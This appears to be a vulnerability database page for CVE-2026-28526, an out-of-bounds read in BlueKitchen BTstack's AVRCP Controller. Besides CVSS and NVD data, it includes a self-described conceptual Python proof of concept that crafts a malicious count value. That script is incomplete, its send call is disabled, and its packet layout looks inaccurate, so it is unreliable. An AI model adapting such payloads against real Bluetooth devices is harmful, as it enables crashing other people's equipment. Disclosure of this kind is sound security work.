Security Vulnerability Report
CVE-2026-28526 CVSS 3.5 LOW

CVE-2026-28526

Published: 2026-03-30 14:16:35
Last Modified: 2026-04-03 15:58:19

Description

BlueKitchen BTstack versions prior to 1.8.1 contain an out-of-bounds read vulnerability in the AVRCP Controller LIST_PLAYER_APPLICATION_SETTING_ATTRIBUTES and LIST_PLAYER_APPLICATION_SETTING_VALUES handlers that allows attackers to read beyond buffer boundaries. A nearby attacker with a paired Bluetooth Classic connection can send a specially crafted VENDOR_DEPENDENT response with an attacker-controlled count value to trigger an out-of-bounds read from the L2CAP receive buffer, potentially causing a crash on resource-constrained devices.

CVSS Details

CVSS Score
3.5
Severity
LOW
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:bluekitchen-gmbh:btstack:*:*:*:*:*:*:*:* - VULNERABLE
BlueKitchen BTstack < 1.8.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket
import struct

# This is a conceptual PoC for sending a malicious AVRCP VENDOR_DEPENDENT response.
# It requires a paired Bluetooth connection and raw L2CAP socket access.


def send_malicious_avrcp_response(target_bt_mac, psm):
    # Create a raw Bluetooth L2CAP socket
    # Note: This typically requires root privileges and specific hardware support
    sock = socket.socket(socket.AF_BLUETOOTH, socket.SOCK_RAW, socket.BTPROTO_L2CAP)
    target_addr = (target_bt_mac, psm)

    # Construct the malicious VENDOR_DEPENDENT response
    # The vulnerability lies in the 'count' field being too large
    transaction_label = 0x01
    pdu_id = 0x10            # Example PDU ID for VENDOR_DEPENDENT
    c_type = 0x00            # Response
    company_id = 0x00001958  # Example Company ID (might vary)

    # Malicious payload: count value is set to 0xFFFF to trigger OOB read
    # Structure: [Header] [Company ID] [Count] ...
    malicious_count = 0xFFFF

    # Assemble the packet (Simplified structure)
    # Real implementation requires correct AVRCP framing over L2CAP
    header = struct.pack("BBBB", transaction_label, pdu_id, c_type, 0x00)
    company_id_bytes = struct.pack("<I", company_id)
    payload = struct.pack("<H", malicious_count) + b"A" * 10  # Padding

    # In a real exploit, this payload would be encapsulated in L2CAP
    # and sent to the target's PSM for AVRCP Control.
    print(f"[+] Sending malicious packet to {target_bt_mac} on PSM {psm}")
    print(f"[+] Malicious count value: {malicious_count}")
    # sock.sendto(header + company_id_bytes + payload, target_addr)
    # sock.close()


if __name__ == "__main__":
    # Replace with actual target MAC and PSM
    TARGET_MAC = "00:11:22:33:44:55"
    AVRCP_CONTROL_PSM = 0x17  # Default AVRCP control PSM
    send_malicious_avrcp_response(TARGET_MAC, AVRCP_CONTROL_PSM)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-28526", "sourceIdentifier": "[email protected]", "published": "2026-03-30T14:16:34.750", "lastModified": "2026-04-03T15:58:18.837", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "BlueKitchen BTstack versions prior to 1.8.1 contain an out-of-bounds read vulnerability in the AVRCP Controller LIST_PLAYER_APPLICATION_SETTING_ATTRIBUTES and LIST_PLAYER_APPLICATION_SETTING_VALUES handlers that allows attackers to read beyond buffer boundaries. A nearby attacker with a paired Bluetooth Classic connection can send a specially crafted VENDOR_DEPENDENT response with an attacker-controlled count value to trigger an out-of-bounds read from the L2CAP receive buffer, potentially causing a crash on resource-constrained devices."}, {"lang": "es", "value": "Las versiones de BlueKitchen BTstack anteriores a la 1.8.1 contienen una vulnerabilidad de lectura fuera de límites en los manejadores LIST_PLAYER_APPLICATION_SETTING_ATTRIBUTES y LIST_PLAYER_APPLICATION_SETTING_VALUES del controlador AVRCP que permite a los atacantes leer más allá de los límites del búfer. Un atacante cercano con una conexión Bluetooth Classic emparejada puede enviar una respuesta VENDOR_DEPENDENT especialmente diseñada con un valor de conteo controlado por el atacante para activar una lectura fuera de límites desde el búfer de recepción L2CAP, lo que podría causar un fallo en dispositivos con recursos limitados."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.1, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:bluekitchen-gmbh:btstack:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.8.1", "matchCriteriaId": "C2852C96-CC34-4FB3-9CB9-0048722A6617"}]}]}], "references": [{"url": "https://github.com/bluekitchen/btstack/releases/tag/v1.8.1", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.vulncheck.com/advisories/bluekitchen-btstack-avrcp-controller-list-player-application-setting-handlers-oob-read", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}